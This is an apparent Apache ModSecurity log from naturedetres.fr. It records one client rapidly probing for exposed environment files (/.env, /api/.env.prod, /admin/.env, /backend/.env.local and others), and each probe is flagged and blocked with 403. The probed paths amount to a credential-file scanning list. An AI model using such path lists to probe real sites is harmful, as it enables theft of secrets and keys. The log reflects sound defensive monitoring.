[Tue May 12 05:26:57.370592 2026] [security2:error] [pid 1842385:tid 1842404] [client 51.195.102.189:43030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/api/.env.dev"] [unique_id "agKeARs7kySIUZ3ORnIliwAAAQ4"]
[Tue May 12 05:26:57.370658 2026] [security2:error] [pid 1842385:tid 1842414] [client 51.195.102.189:42988] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/admin/.env"] [unique_id "agKeARs7kySIUZ3ORnIljQAAARc"]
[Tue May 12 05:26:57.370751 2026] [security2:error] [pid 1842385:tid 1842413] [client 51.195.102.189:43062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/api/.env.prod"] [unique_id "agKeARs7kySIUZ3ORnIligAAARY"]
[Tue May 12 05:26:57.370765 2026] [security2:error] [pid 1842385:tid 1842412] [client 51.195.102.189:42856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/api/.env.local"] [unique_id "agKeARs7kySIUZ3ORnIljAAAARU"]
[Tue May 12 05:26:57.370789 2026] [security2:error] [pid 1842385:tid 1842404] [client 51.195.102.189:43030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/api/.env.dev"] [unique_id "agKeARs7kySIUZ3ORnIliwAAAQ4"]
[Tue May 12 05:26:57.370839 2026] [security2:error] [pid 1842385:tid 1842414] [client 51.195.102.189:42988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/admin/.env"] [unique_id "agKeARs7kySIUZ3ORnIljQAAARc"]
[Tue May 12 05:26:57.371003 2026] [security2:error] [pid 1842385:tid 1842413] [client 51.195.102.189:43062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeARs7kySIUZ3ORnIligAAARY"]
[Tue May 12 05:26:57.371021 2026] [security2:error] [pid 1842385:tid 1842404] [client 51.195.102.189:43030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeARs7kySIUZ3ORnIliwAAAQ4"]
[Tue May 12 05:26:57.371027 2026] [security2:error] [pid 1844863:tid 1844874] [client 51.195.102.189:42958] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/public/.env"] [unique_id "agKeAfaAnTZtx1_H_wy20AAAAUU"]
[Tue May 12 05:26:57.371026 2026] [security2:error] [pid 1842385:tid 1842412] [client 51.195.102.189:42856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeARs7kySIUZ3ORnIljAAAARU"]
[Tue May 12 05:26:57.371068 2026] [security2:error] [pid 1842385:tid 1842414] [client 51.195.102.189:42988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeARs7kySIUZ3ORnIljQAAARc"]
[Tue May 12 05:26:57.371159 2026] [security2:error] [pid 1844863:tid 1844884] [client 51.195.102.189:43052] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/backend/.env"] [unique_id "agKeAfaAnTZtx1_H_wy20QAAAU8"]
[Tue May 12 05:26:57.371178 2026] [security2:error] [pid 1844863:tid 1844874] [client 51.195.102.189:42958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/public/.env"] [unique_id "agKeAfaAnTZtx1_H_wy20AAAAUU"]
[Tue May 12 05:26:57.371323 2026] [security2:error] [pid 1844863:tid 1844884] [client 51.195.102.189:43052] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/backend/.env"] [unique_id "agKeAfaAnTZtx1_H_wy20QAAAU8"]
[Tue May 12 05:26:57.371347 2026] [security2:error] [pid 1825287:tid 1825322] [client 51.195.102.189:42830] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/backend/.env.local"] [unique_id "agKeAQgpmE1yW0glLdgttQAAANE"]
[Tue May 12 05:26:57.371377 2026] [security2:error] [pid 1844863:tid 1844874] [client 51.195.102.189:42958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAfaAnTZtx1_H_wy20AAAAUU"]
[Tue May 12 05:26:57.371506 2026] [security2:error] [pid 1825287:tid 1825322] [client 51.195.102.189:42830] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/backend/.env.local"] [unique_id "agKeAQgpmE1yW0glLdgttQAAANE"]
[Tue May 12 05:26:57.371554 2026] [security2:error] [pid 1844863:tid 1844884] [client 51.195.102.189:43052] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAfaAnTZtx1_H_wy20QAAAU8"]
[Tue May 12 05:26:57.371670 2026] [security2:error] [pid 1820198:tid 1820214] [client 51.195.102.189:42904] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/backend/.env.test"] [unique_id "agKeAc1tk6y7yBJLpJo5MwAAAI4"]
[Tue May 12 05:26:57.371704 2026] [security2:error] [pid 1808852:tid 1808866] [client 51.195.102.189:42834] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/app/.env.dev"] [unique_id "agKeARfeipD4uoG21FowUwAAAAs"]
[Tue May 12 05:26:57.371716 2026] [security2:error] [pid 1825287:tid 1825322] [client 51.195.102.189:42830] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAQgpmE1yW0glLdgttQAAANE"]
[Tue May 12 05:26:57.371738 2026] [security2:error] [pid 1844863:tid 1844885] [client 51.195.102.189:42934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/admin/.env.test"] [unique_id "agKeAfaAnTZtx1_H_wy20gAAAVA"]
[Tue May 12 05:26:57.371848 2026] [security2:error] [pid 1820198:tid 1820214] [client 51.195.102.189:42904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/backend/.env.test"] [unique_id "agKeAc1tk6y7yBJLpJo5MwAAAI4"]
[Tue May 12 05:26:57.371914 2026] [security2:error] [pid 1844863:tid 1844885] [client 51.195.102.189:42934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/admin/.env.test"] [unique_id "agKeAfaAnTZtx1_H_wy20gAAAVA"]
[Tue May 12 05:26:57.371927 2026] [security2:error] [pid 1808852:tid 1808866] [client 51.195.102.189:42834] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/app/.env.dev"] [unique_id "agKeARfeipD4uoG21FowUwAAAAs"]
[Tue May 12 05:26:57.371988 2026] [security2:error] [pid 1808852:tid 1808855] [client 51.195.102.189:42974] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/api/.env"] [unique_id "agKeARfeipD4uoG21FowVAAAAAA"]
[Tue May 12 05:26:57.372023 2026] [security2:error] [pid 1825179:tid 1825201] [client 51.195.102.189:42844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/.env"] [unique_id "agKeAdr1yOh9TvizeziezAAAAEM"]
[Tue May 12 05:26:57.372070 2026] [security2:error] [pid 1820198:tid 1820214] [client 51.195.102.189:42904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAc1tk6y7yBJLpJo5MwAAAI4"]
[Tue May 12 05:26:57.372108 2026] [security2:error] [pid 1825179:tid 1825209] [client 51.195.102.189:43006] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/api/.env.test"] [unique_id "agKeAdr1yOh9TvizeziezgAAAEs"]
[Tue May 12 05:26:57.372151 2026] [security2:error] [pid 1844863:tid 1844885] [client 51.195.102.189:42934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAfaAnTZtx1_H_wy20gAAAVA"]
[Tue May 12 05:26:57.372161 2026] [security2:error] [pid 1808852:tid 1808855] [client 51.195.102.189:42974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/api/.env"] [unique_id "agKeARfeipD4uoG21FowVAAAAAA"]
[Tue May 12 05:26:57.372173 2026] [security2:error] [pid 1825179:tid 1825201] [client 51.195.102.189:42844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/.env"] [unique_id "agKeAdr1yOh9TvizeziezAAAAEM"]
[Tue May 12 05:26:57.372175 2026] [security2:error] [pid 1825179:tid 1825207] [client 51.195.102.189:42836] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/admin/.env.dev"] [unique_id "agKeAdr1yOh9TvizeziezQAAAEk"]
[Tue May 12 05:26:57.372221 2026] [security2:error] [pid 1808852:tid 1808866] [client 51.195.102.189:42834] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeARfeipD4uoG21FowUwAAAAs"]
[Tue May 12 05:26:57.372262 2026] [security2:error] [pid 1825179:tid 1825209] [client 51.195.102.189:43006] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/api/.env.test"] [unique_id "agKeAdr1yOh9TvizeziezgAAAEs"]
[Tue May 12 05:26:57.372335 2026] [security2:error] [pid 1825179:tid 1825207] [client 51.195.102.189:42836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/admin/.env.dev"] [unique_id "agKeAdr1yOh9TvizeziezQAAAEk"]
[Tue May 12 05:26:57.372367 2026] [security2:error] [pid 1808852:tid 1808855] [client 51.195.102.189:42974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeARfeipD4uoG21FowVAAAAAA"]
[Tue May 12 05:26:57.372374 2026] [security2:error] [pid 1825179:tid 1825201] [client 51.195.102.189:42844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAdr1yOh9TvizeziezAAAAEM"]
[Tue May 12 05:26:57.372458 2026] [security2:error] [pid 1825179:tid 1825209] [client 51.195.102.189:43006] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agKeAdr1yOh9TvizeziezgAAAEs"]
[Tue May 12 05:26:57.372527 2026] [security2:error] [pid 1820198:tid 1820220] [client 51.195.102.189:43014] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/www/.env"] [unique_id "agKeAc1tk6y7yBJLpJo5NAAAAJQ"]
